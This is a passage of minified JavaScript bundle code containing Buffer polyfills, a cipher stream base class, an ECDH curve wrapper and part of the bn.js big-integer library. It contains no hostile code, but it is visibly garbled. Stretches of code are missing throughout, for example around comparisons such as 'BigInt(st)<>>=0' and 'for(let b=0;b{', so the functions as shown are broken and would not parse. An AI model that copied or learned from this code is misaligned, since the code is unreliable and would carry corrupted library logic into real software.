0===$e)&&ze(Te,this.length-8);const st=(Le<<24)+this[++Te]*Lo(2,16)+this[++Te]*Lo(2,8)+this[++Te];return(BigInt(st)<>>=0,Le||R(Te,4,this.length),j.read(this,Te,!0,23,4)},U.prototype.readFloatBE=function(Te,Le){return Te>>>=0,Le||R(Te,4,this.length),j.read(this,Te,!1,23,4)},U.prototype.readDoubleLE=function(Te,Le){return Te>>>=0,Le||R(Te,8,this.length),j.read(this,Te,!0,52,8)},U.prototype.readDoubleBE=function(Te,Le){return Te>>>=0,Le||R(Te,8,this.length),j.read(this,Te,!1,52,8)},U.prototype.writeUintLE=U.prototype.writeUIntLE=function(Te,Le,$e,st){Te=+Te,Le>>>=0,$e>>>=0,st||J(this,Te,Le,$e,Math.pow(2,8*$e)-1,0);let xt=1,pt=0;for(this[Le]=255&Te;++pt<$e&&(xt*=256);)this[Le+pt]=Te/xt&255;return Le+$e},U.prototype.writeUintBE=U.prototype.writeUIntBE=function(Te,Le,$e,st){Te=+Te,Le>>>=0,$e>>>=0,st||J(this,Te,Le,$e,Math.pow(2,8*$e)-1,0);let xt=$e-1,pt=1;for(this[Le+xt]=255&Te;--xt>=0&&(pt*=256);)this[Le+xt]=Te/pt&255;return Le+$e},U.prototype.writeUint8=U.prototype.writeUInt8=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,1,255,0),this[Le]=255&Te,Le+1},U.prototype.writeUint16LE=U.prototype.writeUInt16LE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,2,65535,0),this[Le]=255&Te,this[Le+1]=Te>>>8,Le+2},U.prototype.writeUint16BE=U.prototype.writeUInt16BE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,2,65535,0),this[Le]=Te>>>8,this[Le+1]=255&Te,Le+2},U.prototype.writeUint32LE=U.prototype.writeUInt32LE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,4,4294967295,0),this[Le+3]=Te>>>24,this[Le+2]=Te>>>16,this[Le+1]=Te>>>8,this[Le]=255&Te,Le+4},U.prototype.writeUint32BE=U.prototype.writeUInt32BE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,4,4294967295,0),this[Le]=Te>>>24,this[Le+1]=Te>>>16,this[Le+2]=Te>>>8,this[Le+3]=255&Te,Le+4},U.prototype.writeBigUInt64LE=We(function(Te,Le=0){return Z(this,Te,Le,BigInt(0),BigInt("0xffffffffffffffff"))}),U.prototype.writeBigUInt64BE=We(function(Te,Le=0){return ue(this,Te,Le,BigInt(0),BigInt("0xffffffffffffffff"))}),U.prototype.writeIntLE=function(Te,Le,$e,st){if(Te=+Te,Le>>>=0,!st){const Wi=Math.pow(2,8*$e-1);J(this,Te,Le,$e,Wi-1,-Wi)}let xt=0,pt=1,vt=0;for(this[Le]=255&Te;++xt<$e&&(pt*=256);)Te<0&&0===vt&&0!==this[Le+xt-1]&&(vt=1),this[Le+xt]=(Te/pt>>0)-vt&255;return Le+$e},U.prototype.writeIntBE=function(Te,Le,$e,st){if(Te=+Te,Le>>>=0,!st){const Wi=Math.pow(2,8*$e-1);J(this,Te,Le,$e,Wi-1,-Wi)}let xt=$e-1,pt=1,vt=0;for(this[Le+xt]=255&Te;--xt>=0&&(pt*=256);)Te<0&&0===vt&&0!==this[Le+xt+1]&&(vt=1),this[Le+xt]=(Te/pt>>0)-vt&255;return Le+$e},U.prototype.writeInt8=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,1,127,-128),Te<0&&(Te=255+Te+1),this[Le]=255&Te,Le+1},U.prototype.writeInt16LE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,2,32767,-32768),this[Le]=255&Te,this[Le+1]=Te>>>8,Le+2},U.prototype.writeInt16BE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,2,32767,-32768),this[Le]=Te>>>8,this[Le+1]=255&Te,Le+2},U.prototype.writeInt32LE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,4,2147483647,-2147483648),this[Le]=255&Te,this[Le+1]=Te>>>8,this[Le+2]=Te>>>16,this[Le+3]=Te>>>24,Le+4},U.prototype.writeInt32BE=function(Te,Le,$e){return Te=+Te,Le>>>=0,$e||J(this,Te,Le,4,2147483647,-2147483648),Te<0&&(Te=4294967295+Te+1),this[Le]=Te>>>24,this[Le+1]=Te>>>16,this[Le+2]=Te>>>8,this[Le+3]=255&Te,Le+4},U.prototype.writeBigInt64LE=We(function(Te,Le=0){return Z(this,Te,Le,-BigInt("0x8000000000000000"),BigInt("0x7fffffffffffffff"))}),U.prototype.writeBigInt64BE=We(function(Te,Le=0){return ue(this,Te,Le,-BigInt("0x8000000000000000"),BigInt("0x7fffffffffffffff"))}),U.prototype.writeFloatLE=function(Te,Le,$e){return Ae(this,Te,Le,!0,$e)},U.prototype.writeFloatBE=function(Te,Le,$e){return Ae(this,Te,Le,!1,$e)},U.prototype.writeDoubleLE=function(Te,Le,$e){return Ue(this,Te,Le,!0,$e)},U.prototype.writeDoubleBE=function(Te,Le,$e){return Ue(this,Te,Le,!1,$e)},U.prototype.copy=function(Te,Le,$e,st){if(!U.isBuffer(Te))throw new TypeError("argument should be a Buffer");if($e||($e=0),!st&&0!==st&&(st=this.length),Le>=Te.length&&(Le=Te.length),Le||(Le=0),st>0&&st<$e&&(st=$e),st===$e||0===Te.length||0===this.length)return 0;if(Le<0)throw new RangeError("targetStart out of bounds");if($e<0||$e>=this.length)throw new RangeError("Index out of range");if(st<0)throw new RangeError("sourceEnd out of bounds");st>this.length&&(st=this.length),Te.length-Le>>=0,$e=void 0===$e?this.length:$e>>>0,Te||(Te=0),"number"==typeof Te)for(xt=Le;xt<$e;++xt)this[xt]=Te;else{const pt=U.isBuffer(Te)?Te:U.from(Te,st),vt=pt.length;if(0===vt)throw new TypeError('The value "'+Te+'" is invalid for argument "value"');for(xt=0;xt<$e-Le;++xt)this[xt+Le]=pt[xt%vt]}return this};const Xe={};function He(Oe,Te,Le){Xe[Oe]=class extends Le{constructor(){super(),Object.defineProperty(this,"message",{value:Te.apply(this,arguments),writable:!0,configurable:!0}),this.name=`${this.name} [${Oe}]`,delete this.name}get code(){return Oe}set code(st){Object.defineProperty(this,"code",{configurable:!0,enumerable:!0,value:st,writable:!0})}toString(){return`${this.name} [${Oe}]: ${this.message}`}}}function Be(Oe){let Te="",Le=Oe.length;const $e="-"===Oe[0]?1:0;for(;Le>=$e+4;Le-=3)Te=`_${Oe.slice(Le-3,Le)}${Te}`;return`${Oe.slice(0,Le)}${Te}`}function De(Oe,Te,Le,$e,st,xt){if(Oe>Le||Oe3?0===Te||Te===BigInt(0)?`>= 0${pt} and < 2${pt} ** ${8*(xt+1)}${pt}`:`>= -(2${pt} ** ${8*(xt+1)-1}${pt}) and < 2 ** ${8*(xt+1)-1}${pt}`:`>= ${Te}${pt} and <= ${Le}${pt}`,new Xe.ERR_OUT_OF_RANGE("value",vt,Oe)}!function qe(Oe,Te,Le){Ve(Te,"offset"),(void 0===Oe[Te]||void 0===Oe[Te+Le])&&ze(Te,Oe.length-(Le+1))}($e,st,xt)}function Ve(Oe,Te){if("number"!=typeof Oe)throw new Xe.ERR_INVALID_ARG_TYPE(Te,"number",Oe)}function ze(Oe,Te,Le){throw Math.floor(Oe)!==Oe?(Ve(Oe,Le),new Xe.ERR_OUT_OF_RANGE(Le||"offset","an integer",Oe)):Te<0?new Xe.ERR_BUFFER_OUT_OF_BOUNDS:new Xe.ERR_OUT_OF_RANGE(Le||"offset",`>= ${Le?1:0} and <= ${Te}`,Oe)}He("ERR_BUFFER_OUT_OF_BOUNDS",function(Oe){return Oe?`${Oe} is outside of buffer bounds`:"Attempt to access memory outside buffer bounds"},RangeError),He("ERR_INVALID_ARG_TYPE",function(Oe,Te){return`The "${Oe}" argument must be of type number. Received type ${typeof Te}`},TypeError),He("ERR_OUT_OF_RANGE",function(Oe,Te,Le){let $e=`The value of "${Oe}" is out of range.`,st=Le;return Number.isInteger(Le)&&Math.abs(Le)>Lo(2,32)?st=Be(String(Le)):"bigint"==typeof Le&&(st=String(Le),(Le>Lo(BigInt(2),BigInt(32))||Le<-Lo(BigInt(2),BigInt(32)))&&(st=Be(st)),st+="n"),$e+=` It must be ${Te}. Received ${st}`,$e},RangeError);const me=/[^+/0-9A-Za-z-_]/g;function rt(Oe,Te){let Le;Te=Te||1/0;const $e=Oe.length;let st=null;const xt=[];for(let pt=0;pt<$e;++pt){if(Le=Oe.charCodeAt(pt),Le>55295&&Le<57344){if(!st){if(Le>56319){(Te-=3)>-1&&xt.push(239,191,189);continue}if(pt+1===$e){(Te-=3)>-1&&xt.push(239,191,189);continue}st=Le;continue}if(Le<56320){(Te-=3)>-1&&xt.push(239,191,189),st=Le;continue}Le=65536+(st-55296<<10|Le-56320)}else st&&(Te-=3)>-1&&xt.push(239,191,189);if(st=null,Le<128){if((Te-=1)<0)break;xt.push(Le)}else if(Le<2048){if((Te-=2)<0)break;xt.push(Le>>6|192,63&Le|128)}else if(Le<65536){if((Te-=3)<0)break;xt.push(Le>>12|224,Le>>6&63|128,63&Le|128)}else{if(!(Le<1114112))throw new Error("Invalid code point");if((Te-=4)<0)break;xt.push(Le>>18|240,Le>>12&63|128,Le>>6&63|128,63&Le|128)}}return xt}function ht(Oe){return ie.toByteArray(function Ke(Oe){if((Oe=(Oe=Oe.split("=")[0]).trim().replace(me,"")).length<2)return"";for(;Oe.length%4!=0;)Oe+="=";return Oe}(Oe))}function mt(Oe,Te,Le,$e){let st;for(st=0;st<$e&&!(st+Le>=Te.length||st>=Oe.length);++st)Te[st+Le]=Oe[st];return st}function lt(Oe,Te){return Oe instanceof Te||null!=Oe&&null!=Oe.constructor&&null!=Oe.constructor.name&&Oe.constructor.name===Te.name}function ft(Oe){return Oe!=Oe}const xe=function(){const Oe="0123456789abcdef",Te=new Array(256);for(let Le=0;Le<16;++Le){const $e=16*Le;for(let st=0;st<16;++st)Te[$e+st]=Oe[Le]+Oe[st]}return Te}();function We(Oe){return"undefined"==typeof BigInt?Je:Oe}function Je(){throw new Error("BigInt not supported")}},4003:(Pe,we,de)=>{var ie=de(265).Buffer,j=de(4893).Transform,Q=de(5741).s;function I($){j.call(this),this.hashMode="string"==typeof $,this.hashMode?this[$]=this._finalOrDigest:this.final=this._finalOrDigest,this._final&&(this.__final=this._final,this._final=null),this._decoder=null,this._encoding=null}de(2270)(I,j),I.prototype.update=function($,U,E){"string"==typeof $&&($=ie.from($,U));var C=this._update($);return this.hashMode?this:(E&&(C=this._toString(C,E)),C)},I.prototype.setAutoPadding=function(){},I.prototype.getAuthTag=function(){throw new Error("trying to get auth tag in unsupported state")},I.prototype.setAuthTag=function(){throw new Error("trying to set auth tag in unsupported state")},I.prototype.setAAD=function(){throw new Error("trying to set aad in unsupported state")},I.prototype._transform=function($,U,E){var C;try{this.hashMode?this._update($):this.push(this._update($))}catch(b){C=b}finally{E(C)}},I.prototype._flush=function($){var U;try{this.push(this.__final())}catch(E){U=E}$(U)},I.prototype._finalOrDigest=function($){var U=this.__final()||ie.alloc(0);return $&&(U=this._toString(U,$,!0)),U},I.prototype._toString=function($,U,E){if(this._decoder||(this._decoder=new Q(U),this._encoding=U),this._encoding!==U)throw new Error("can't switch encodings");var C=this._decoder.write($);return E&&(C+=this._decoder.end()),C},Pe.exports=I},4730:(Pe,we,de)=>{"use strict";const ie=de(7856),j=de(7374),Q=de(9045);Pe.exports=function ae(U,E){switch(j(U)){case"object":return function I(U,E){if("function"==typeof E)return E(U);if(E||Q(U)){const C=new U.constructor;for(let b in U)C[b]=ae(U[b],E);return C}return U}(U,E);case"array":return function $(U,E){const C=new U.constructor(U.length);for(let b=0;b{"use strict";var ie=de(7729);function j(Q){return!0===ie(Q)&&"[object Object]"===Object.prototype.toString.call(Q)}Pe.exports=function(ae){var I,$;return!(!1===j(ae)||(I=ae.constructor,"function"!=typeof I)||($=I.prototype,!1===j($))||!1===$.hasOwnProperty("isPrototypeOf"))}},4707:(Pe,we,de)=>{var ie=de(5449).Buffer,j=de(1875),Q=de(8752);Pe.exports=function(E){return new I(E)};var ae={secp256k1:{name:"secp256k1",byteLength:32},secp224r1:{name:"p224",byteLength:28},prime256v1:{name:"p256",byteLength:32},prime192v1:{name:"p192",byteLength:24},ed25519:{name:"ed25519",byteLength:32},secp384r1:{name:"p384",byteLength:48},secp521r1:{name:"p521",byteLength:66}};function I(U){this.curveType=ae[U],this.curveType||(this.curveType={name:U}),this.curve=new j.ec(this.curveType.name),this.keys=void 0}function $(U,E,C){Array.isArray(U)||(U=U.toArray());var b=new ie(U);if(C&&b.length=65&&f<=70?f-55:f>=97&&f<=102?f-87:f-48&15}function E(z,l,f){var v=U(z,f);return f-1>=l&&(v|=U(z,f-1)<<4),v}function C(z,l,f,v){for(var M=0,P=Math.min(z.length,f),G=l;G=49?X-49+10:X>=17?X-17+10:X}return M}I.isBN=function(l){return l instanceof I||null!==l&&"object"==typeof l&&l.constructor.wordSize===I.wordSize&&Array.isArray(l.words)},I.max=function(l,f){return l.cmp(f)>0?l:f},I.min=function(l,f){return l.cmp(f)<0?l:f},I.prototype._init=function(l,f,v){if("number"==typeof l)return this._initNumber(l,f,v);if("object"==typeof l)return this._initArray(l,f,v);"hex"===f&&(f=16),Q(f===(0|f)&&f>=2&&f<=36);var M=0;"-"===(l=l.toString().replace(/\s+/g,""))[0]&&(M++,this.negative=1),M=0;M-=3)this.words[P]|=(G=l[M]|l[M-1]<<8|l[M-2]<<16)<>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);else if("le"===v)for(M=0,P=0;M>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);return this.strip()},I.prototype._parseHex=function(l,f,v){this.length=Math.ceil((l.length-f)/6),this.words=new Array(this.length);for(var M=0;M=f;M-=2)X=E(l,f,M)<=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;else for(M=(l.length-f)%2==0?f+1:f;M=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;this.strip()},I.prototype._parseBase=function(l,f,v){this.words=[0],this.length=1;for(var M=0,P=1;P<=67108863;P*=f)M++;M--,P=P/f|0;for(var G=l.length-v,X=G%M,L=Math.min(G,G-X)+v,h=0,R=v;R1&&0===this.words[this.length-1];)this.length--;return this._normSign()},I.prototype._normSign=function(){return 1===this.length&&0===this.words[0]&&(this.negative=0),this},I.prototype.inspect=function(){return(this.red?""};var b=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","0000000000000000000","00000000000000000000","000000000000000000000","0000000000000000000000","00000000000000000000000","000000000000000000000000","0000000000000000000000000"],_=[0,0,25,16,12,11,10,9,8,8,7,7,7,7,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],y=[0,0,33554432,43046721,16777216,48828125,60466176,40353607,16777216,43046721,1e7,19487171,35831808,62748517,7529536,11390625,16777216,24137569,34012224,47045881,64e6,4084101,5153632,6436343,7962624,9765625,11881376,14348907,17210368,20511149,243e5,28629151,33554432,39135393,45435424,52521875,60466176];function p(z,l,f){f.negative=l.negative^z.negative;var v=z.length+l.length|0;f.length=v,v=v-1|0;var M=0|z.words[0],P=0|l.words[0],G=M*P,L=G/67108864|0;f.words[0]=67108863&G;for(var h=1;h>>26,J=67108863&L,Z=Math.min(h,l.length-1),ue=Math.max(0,h-z.length+1);ue<=Z;ue++)R+=(G=(M=0|z.words[h-ue|0])*(P=0|l.words[ue])+J)/67108864|0,J=67108863&G;f.words[h]=0|J,L=0|R}return 0!==L?f.words[h]=0|L:f.length--,f.strip()}I.prototype.toString=function(l,f){var v;if(f=0|f||1,16===(l=l||10)||"hex"===l){v="";for(var M=0,P=0,G=0;G>>24-M&16777215)||G!==this.length-1?b[6-L.length]+L+v:L+v,(M+=2)>=26&&(M-=26,G--)}for(0!==P&&(v=P.toString(16)+v);v.length%f!=0;)v="0"+v;return 0!==this.negative&&(v="-"+v),v}if(l===(0|l)&&l>=2&&l<=36){var h=_[l],R=y[l];v="";var J=this.clone();for(J.negative=0;!J.isZero();){var Z=J.modn(R).toString(l);v=(J=J.idivn(R)).isZero()?Z+v:b[h-Z.length]+Z+v}for(this.isZero()&&(v="0"+v);v.length%f!=0;)v="0"+v;return 0!==this.negative&&(v="-"+v),v}Q(!1,"Base should be between 2 and 36")},I.prototype.toNumber=function(){var l=this.words[0];return 2===this.length?l+=67108864*this.words[1]:3===this.length&&1===this.words[2]?l+=4503599627370496+67108864*this.words[1]:this.length>2&&Q(!1,"Number can only safely store up to 53 bits"),0!==this.negative?-l:l},I.prototype.toJSON=function(){return this.toString(16)},I.prototype.toBuffer=function(l,f){return Q(void 0!==$),this.toArrayLike($,l,f)},I.prototype.toArray=function(l,f){return this.toArrayLike(Array,l,f)},I.prototype.toArrayLike=function(l,f,v){var M=this.byteLength(),P=v||Math.max(1,M);Q(M<=P,"byte array longer than desired length"),Q(P>0,"Requested array length <= 0"),this.strip();var L,h,G="le"===f,X=new l(P),R=this.clone();if(G){for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[h]=L;for(;h=4096&&(v+=13,f>>>=13),f>=64&&(v+=7,f>>>=7),f>=8&&(v+=4,f>>>=4),f>=2&&(v+=2,f>>>=2),v+f},I.prototype._zeroBits=function(l){if(0===l)return 26;var f=l,v=0;return 0==(8191&f)&&(v+=13,f>>>=13),0==(127&f)&&(v+=7,f>>>=7),0==(15&f)&&(v+=4,f>>>=4),0==(3&f)&&(v+=2,f>>>=2),0==(1&f)&&v++,v},I.prototype.bitLength=function(){var f=this._countBits(this.words[this.length-1]);return 26*(this.length-1)+f},I.prototype.zeroBits=function(){if(this.isZero())return 0;for(var l=0,f=0;fl.length?this.clone().ior(l):l.clone().ior(this)},I.prototype.uor=function(l){return this.length>l.length?this.clone().iuor(l):l.clone().iuor(this)},I.prototype.iuand=function(l){var f;f=this.length>l.length?l:this;for(var v=0;vl.length?this.clone().iand(l):l.clone().iand(this)},I.prototype.uand=function(l){return this.length>l.length?this.clone().iuand(l):l.clone().iuand(this)},I.prototype.iuxor=function(l){var f,v;this.length>l.length?(f=this,v=l):(f=l,v=this);for(var M=0;Ml.length?this.clone().ixor(l):l.clone().ixor(this)},I.prototype.uxor=function(l){return this.length>l.length?this.clone().iuxor(l):l.clone().iuxor(this)},I.prototype.inotn=function(l){Q("number"==typeof l&&l>=0);var f=0|Math.ceil(l/26),v=l%26;this._expand(f),v>0&&f--;for(var M=0;M0&&(this.words[M]=~this.words[M]&67108863>>26-v),this.strip()},I.prototype.notn=function(l){return this.clone().inotn(l)},I.prototype.setn=function(l,f){Q("number"==typeof l&&l>=0);var v=l/26|0,M=l%26;return this._expand(v+1),this.words[v]=f?this.words[v]|1<l.length?(v=this,M=l):(v=l,M=this);for(var P=0,G=0;G>>26;for(;0!==P&&G>>26;if(this.length=v.length,0!==P)this.words[this.length]=P,this.length++;else if(v!==this)for(;Gl.length?this.clone().iadd(l):l.clone().iadd(this)},I.prototype.isub=function(l){if(0!==l.negative){l.negative=0;var f=this.iadd(l);return l.negative=1,f._normSign()}if(0!==this.negative)return this.negative=0,this.iadd(l),this.negative=1,this._normSign();var M,P,v=this.cmp(l);if(0===v)return this.negative=0,this.length=1,this.words[0]=0,this;v>0?(M=this,P=l):(M=l,P=this);for(var G=0,X=0;X>26,this.words[X]=67108863&f;for(;0!==G&&X>26,this.words[X]=67108863&f;if(0===G&&X>>13,Ie=0|M[1],Ae=8191&Ie,Ue=Ie>>>13,Xe=0|M[2],He=8191&Xe,Be=Xe>>>13,qe=0|M[3],De=8191&qe,Ve=qe>>>13,ze=0|M[4],me=8191&ze,Ke=ze>>>13,rt=0|M[5],Ge=8191&rt,Qe=rt>>>13,ht=0|M[6],mt=8191&ht,lt=ht>>>13,ft=0|M[7],xe=8191&ft,We=ft>>>13,Je=0|M[8],Oe=8191&Je,Te=Je>>>13,Le=0|M[9],$e=8191&Le,st=Le>>>13,xt=0|P[0],pt=8191&xt,vt=xt>>>13,Wi=0|P[1],Ft=8191&Wi,zt=Wi>>>13,pa=0|P[2],Jt=8191&pa,Gt=pa>>>13,Co=0|P[3],jt=8191&Co,qt=Co>>>13,Qn=0|P[4],Kt=8191&Qn,Zt=Qn>>>13,Bo=0|P[5],ti=8191&Bo,ii=Bo>>>13,pn=0|P[6],Pt=8191&pn,Xt=pn>>>13,Ho=0|P[7],Qt=8191&Ho,ei=Ho>>>13,$o=0|P[8],ai=8191&$o,$t=$o>>>13,zo=0|P[9],Ut=8191&zo,Yt=zo>>>13;v.negative=l.negative^f.negative,v.length=19;var ha=(X+(L=Math.imul(Z,pt))|0)+((8191&(h=(h=Math.imul(Z,vt))+Math.imul(ue,pt)|0))<<13)|0;X=((R=Math.imul(ue,vt))+(h>>>13)|0)+(ha>>>26)|0,ha&=67108863,L=Math.imul(Ae,pt),h=(h=Math.imul(Ae,vt))+Math.imul(Ue,pt)|0,R=Math.imul(Ue,vt);var Ha=(X+(L=L+Math.imul(Z,Ft)|0)|0)+((8191&(h=(h=h+Math.imul(Z,zt)|0)+Math.imul(ue,Ft)|0))<<13)|0;X=((R=R+Math.imul(ue,zt)|0)+(h>>>13)|0)+(Ha>>>26)|0,Ha&=67108863,L=Math.imul(He,pt),h=(h=Math.imul(He,vt))+Math.imul(Be,pt)|0,R=Math.imul(Be,vt),L=L+Math.imul(Ae,Ft)|0,h=(h=h+Math.imul(Ae,zt)|0)+Math.imul(Ue,Ft)|0,R=R+Math.imul(Ue,zt)|0;var Va=(X+(L=L+Math.imul(Z,Jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Gt)|0)+Math.imul(ue,Jt)|0))<<13)|0;X=((R=R+Math.imul(ue,Gt)|0)+(h>>>13)|0)+(Va>>>26)|0,Va&=67108863,L=Math.imul(De,pt),h=(h=Math.imul(De,vt))+Math.imul(Ve,pt)|0,R=Math.imul(Ve,vt),L=L+Math.imul(He,Ft)|0,h=(h=h+Math.imul(He,zt)|0)+Math.imul(Be,Ft)|0,R=R+Math.imul(Be,zt)|0,L=L+Math.imul(Ae,Jt)|0,h=(h=h+Math.imul(Ae,Gt)|0)+Math.imul(Ue,Jt)|0,R=R+Math.imul(Ue,Gt)|0;var co=(X+(L=L+Math.imul(Z,jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,qt)|0)+Math.imul(ue,jt)|0))<<13)|0;X=((R=R+Math.imul(ue,qt)|0)+(h>>>13)|0)+(co>>>26)|0,co&=67108863,L=Math.imul(me,pt),h=(h=Math.imul(me,vt))+Math.imul(Ke,pt)|0,R=Math.imul(Ke,vt),L=L+Math.imul(De,Ft)|0,h=(h=h+Math.imul(De,zt)|0)+Math.imul(Ve,Ft)|0,R=R+Math.imul(Ve,zt)|0,L=L+Math.imul(He,Jt)|0,h=(h=h+Math.imul(He,Gt)|0)+Math.imul(Be,Jt)|0,R=R+Math.imul(Be,Gt)|0,L=L+Math.imul(Ae,jt)|0,h=(h=h+Math.imul(Ae,qt)|0)+Math.imul(Ue,jt)|0,R=R+Math.imul(Ue,qt)|0;var io=(X+(L=L+Math.imul(Z,Kt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Zt)|0)+Math.imul(ue,Kt)|0))<<13)|0;X=((R=R+Math.imul(ue,Zt)|0)+(h>>>13)|0)+(io>>>26)|0,io&=67108863,L=Math.imul(Ge,pt),h=(h=Math.imul(Ge,vt))+Math.imul(Qe,pt)|0,R=Math.imul(Qe,vt),L=L+Math.imul(me,Ft)|0,h=(h=h+Math.imul(me,zt)|0)+Math.imul(Ke,Ft)|0,R=R+Math.imul(Ke,zt)|0,L=L+Math.imul(De,Jt)|0,h=(h=h+Math.imul(De,Gt)|0)+Math.imul(Ve,Jt)|0,R=R+Math.imul(Ve,Gt)|0,L=L+Math.imul(He,jt)|0,h=(h=h+Math.imul(He,qt)|0)+Math.imul(Be,jt)|0,R=R+Math.imul(Be,qt)|0,L=L+Math.imul(Ae,Kt)|0,h=(h=h+Math.imul(Ae,Zt)|0)+Math.imul(Ue,Kt)|0,R=R+Math.imul(Ue,Zt)|0;var yo=(X+(L=L+Math.imul(Z,ti)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ii)|0)+Math.imul(ue,ti)|0))<<13)|0;X=((R=R+Math.imul(ue,ii)|0)+(h>>>13)|0)+(yo>>>26)|0,yo&=67108863,L=Math.imul(mt,pt),h=(h=Math.imul(mt,vt))+Math.imul(lt,pt)|0,R=Math.imul(lt,vt),L=L+Math.imul(Ge,Ft)|0,h=(h=h+Math.imul(Ge,zt)|0)+Math.imul(Qe,Ft)|0,R=R+Math.imul(Qe,zt)|0,L=L+Math.imul(me,Jt)|0,h=(h=h+Math.imul(me,Gt)|0)+Math.imul(Ke,Jt)|0,R=R+Math.imul(Ke,Gt)|0,L=L+Math.imul(De,jt)|0,h=(h=h+Math.imul(De,qt)|0)+Math.imul(Ve,jt)|0,R=R+Math.imul(Ve,qt)|0,L=L+Math.imul(He,Kt)|0,h=(h=h+Math.imul(He,Zt)|0)+Math.imul(Be,Kt)|0,R=R+Math.imul(Be,Zt)|0,L=L+Math.imul(Ae,ti)|0,h=(h=h+Math.imul(Ae,ii)|0)+Math.imul(Ue,ti)|0,R=R+Math.imul(Ue,ii)|0;var Vn=(X+(L=L+Math.imul(Z,Pt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Xt)|0)+Math.imul(ue,Pt)|0))<<13)|0;X=((R=R+Math.imul(ue,Xt)|0)+(h>>>13)|0)+(Vn>>>26)|0,Vn&=67108863,L=Math.imul(xe,pt),h=(h=Math.imul(xe,vt))+Math.imul(We,pt)|0,R=Math.imul(We,vt),L=L+Math.imul(mt,Ft)|0,h=(h=h+Math.imul(mt,zt)|0)+Math.imul(lt,Ft)|0,R=R+Math.imul(lt,zt)|0,L=L+Math.imul(Ge,Jt)|0,h=(h=h+Math.imul(Ge,Gt)|0)+Math.imul(Qe,Jt)|0,R=R+Math.imul(Qe,Gt)|0,L=L+Math.imul(me,jt)|0,h=(h=h+Math.imul(me,qt)|0)+Math.imul(Ke,jt)|0,R=R+Math.imul(Ke,qt)|0,L=L+Math.imul(De,Kt)|0,h=(h=h+Math.imul(De,Zt)|0)+Math.imul(Ve,Kt)|0,R=R+Math.imul(Ve,Zt)|0,L=L+Math.imul(He,ti)|0,h=(h=h+Math.imul(He,ii)|0)+Math.imul(Be,ti)|0,R=R+Math.imul(Be,ii)|0,L=L+Math.imul(Ae,Pt)|0,h=(h=h+Math.imul(Ae,Xt)|0)+Math.imul(Ue,Pt)|0,R=R+Math.imul(Ue,Xt)|0;var Eo=(X+(L=L+Math.imul(Z,Qt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ei)|0)+Math.imul(ue,Qt)|0))<<13)|0;X=((R=R+Math.imul(ue,ei)|0)+(h>>>13)|0)+(Eo>>>26)|0,Eo&=67108863,L=Math.imul(Oe,pt),h=(h=Math.imul(Oe,vt))+Math.imul(Te,pt)|0,R=Math.imul(Te,vt),L=L+Math.imul(xe,Ft)|0,h=(h=h+Math.imul(xe,zt)|0)+Math.imul(We,Ft)|0,R=R+Math.imul(We,zt)|0,L=L+Math.imul(mt,Jt)|0,h=(h=h+Math.imul(mt,Gt)|0)+Math.imul(lt,Jt)|0,R=R+Math.imul(lt,Gt)|0,L=L+Math.imul(Ge,jt)|0,h=(h=h+Math.imul(Ge,qt)|0)+Math.imul(Qe,jt)|0,R=R+Math.imul(Qe,qt)|0,L=L+Math.imul(me,Kt)|0,h=(h=h+Math.imul(me,Zt)|0)+Math.imul(Ke,Kt)|0,R=R+Math.imul(Ke,Zt)|0,L=L+Math.imul(De,ti)|0,h=(h=h+Math.imul(De,ii)|0)+Math.imul(Ve,ti)|0,R=R+Math.imul(Ve,ii)|0,L=L+Math.imul(He,Pt)|0,h=(h=h+Math.imul(He,Xt)|0)+Math.imul(Be,Pt)|0,R=R+Math.imul(Be,Xt)|0,L=L+Math.imul(Ae,Qt)|0,h=(h=h+Math.imul(Ae,ei)|0)+Math.imul(Ue,Qt)|0,R=R+Math.imul(Ue,ei)|0;var Pn=(X+(L=L+Math.imul(Z,ai)|0)|0)+((8191&(h=(h=h+Math.imul(Z,$t)|0)+Math.imul(ue,ai)|0))<<13)|0;X=((R=R+Math.imul(ue,$t)|0)+(h>>>13)|0)+(Pn>>>26)|0,Pn&=67108863,L=Math.imul($e,pt),h=(h=Math.imul($e,vt))+Math.imul(st,pt)|0,R=Math.imul(st,vt),L=L+Math.imul(Oe,Ft)|0,h=(h=h+Math.imul(Oe,zt)|0)+Math.imul(Te,Ft)|0,R=R+Math.imul(Te,zt)|0,L=L+Math.imul(xe,Jt)|0,h=(h=h+Math.imul(xe,Gt)|0)+Math.imul(We,Jt)|0,R=R+Math.imul(We,Gt)|0,L=L+Math.imul(mt,jt)|0,h=(h=h+Math.imul(mt,qt)|0)+Math.imul(lt,jt)|0,R=R+Math.imul(lt,qt)|0,L=L+Math.imul(Ge,Kt)|0,h=(h=h+Math.imul(Ge,Zt)|0)+Math.imul(Qe,Kt)|0,R=R+Math.imul(Qe,Zt)|0,L=L+Math.imul(me,ti)|0,h=(h=h+Math.imul(me,ii)|0)+Math.imul(Ke,ti)|0,R=R+Math.imul(Ke,ii)|0,L=L+Math.imul(De,Pt)|0,h=(h=h+Math.imul(De,Xt)|0)+Math.imul(Ve,Pt)|0,R=R+Math.imul(Ve,Xt)|0,L=L+Math.imul(He,Qt)|0,h=(h=h+Math.imul(He,ei)|0